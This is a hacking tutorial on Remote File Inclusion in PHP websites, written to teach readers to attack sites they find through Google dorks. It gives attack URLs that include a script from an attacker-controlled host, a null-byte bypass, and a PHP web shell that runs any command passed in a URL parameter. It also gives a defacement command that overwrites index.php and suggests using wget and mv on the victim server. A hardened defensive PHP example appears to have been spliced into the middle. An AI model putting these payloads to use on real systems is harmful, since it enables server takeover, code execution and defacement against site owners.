Remote File Inclusion (RFI)

RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploits poor validation checks in websites and can eventually lead to code execution on the server or code execution on the website (an XSS attack using JavaScript). This time, I will be writing a simple tutorial on Remote File Inclusion, and by the end of the tutorial I suppose you will know what it is all about and may be able to deploy an attack or two.
RFI is a common vulnerability, and trust me, not all website hacking is about SQL injection. Using RFI you can literally deface websites, get access to the server and do almost anything (including gagging them out or beg... well, that's an exaggeration, but I guess you get the idea :P). What makes it more dangerous is that you only need common sense and basic knowledge of PHP to execute this one; some BASH might come in handy, as most servers today are hosted on Linux.
Okay, let's start. The first step is to find a vulnerable site. You can easily find them using Google dorks. If you don't have any idea, you might want to read about advanced password hacking using Google dorks or use an automated tool to apply Google dorks using Google. Now let's assume we have found a vulnerable website:
http://victimsite.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. We can find ways around it, as it uses the PHP include function to pull them out. Check it out:
http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt
I have included a custom script, “evilscript”, in text format from my website, which contains some code. Now, if it's a vulnerable website, one of 3 cases happens:
  • Case 1 - You might have noticed that the URL with “page=home” had no extension, but I have included an extension in my URL, hence the site may give an error like “failure to include evilscript.txt.txt”. This might happen because the site automatically adds the .txt extension to the pages stored on the server.
  • Case 2 - In case it automatically appends something along the lines of .php, then we have to use a null byte “%00” in order to avoid the error.
  • Case 3 - Successful execution :)
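For reference, here is the server-side pattern behind these three cases next to a hardened replacement. This is an added example, not code from the original post; the pages/ directory, the .txt suffix and the function names resolve_page and render_page are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed layout: page bodies live as .txt files in ./pages next to this script.
const PAGES_DIR = __DIR__ . '/pages';

// VULNERABLE pattern the three cases depend on (shown for contrast, do not deploy):
//   include($_GET['page'] . '.txt');
// With allow_url_include=On in php.ini (it is Off by default), a full URL in
// ?page= is fetched and executed as PHP. Keep that setting Off.

/** Map a requested page name to a file inside $baseDir, or return null. */
function resolve_page(string $name, string $baseDir = PAGES_DIR): ?string
{
    // Character allowlist: rejects "://", "/", "..", any "." and NUL bytes.
    if (preg_match('/\A[a-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.txt');
    if ($base === false || $path === false) {
        return null; // directory missing or unknown page
    }
    // Defence in depth: the resolved path must still sit inside the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $name): string
{
    $file = resolve_page($name);
    if ($file === null) {
        http_response_code(404);
        return 'Page not found';
    }
    // Page content is read as data and escaped, never passed to include().
    return htmlspecialchars((string) file_get_contents($file), ENT_QUOTES, 'UTF-8');
}

// Constructed sample inputs mirroring the cases above; "home" is accepted only
// if pages/home.txt exists, the other three are always rejected.
if (PHP_SAPI === 'cli') {
    foreach (['home', 'http://hackersite.com/evilscript.txt', "home\0", '../index'] as $in) {
        printf("%-45s => %s\n", json_encode($in), resolve_page($in) !== null ? 'served' : 'rejected');
    }
}
```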
Now, once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this, knowledge of PHP might come in handy. Here we go:
<?php
echo "<script>alert('U 4r3 0wn3d !!');</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);
?>
The above code exploits the include function and tests whether the site is RFI (XSS) vulnerable by running the alert box code; if successful, you can send custom commands to the Linux server in bash. So, if you are in luck and it worked, let's try our hands at some Linux commands. For example, to find the current working directory of the server and then list files, we will use the “pwd” and “ls” commands.
http://victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript
http://victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
What it does is send the command as the cmd parameter we put in our script, and it prints the working directory and lists the documents. Even better, you can almost make the page proclaim that you hacked it by using the “echo” command:
cmd=echo U r pwn3d by xero> index.php
It will then rewrite index.php and render it. In case it's a primitive website which stores pages with the .txt extension, you might want to put it along with the .txt files. Now, as expected, we are the alpha and the omega of the website :) We can download, remove, rename, anything! Want to download stuff? Try the “wget” function (cmd=wget... get the idea). Want to move it out? “mv”.
I leave the rest to your creativity.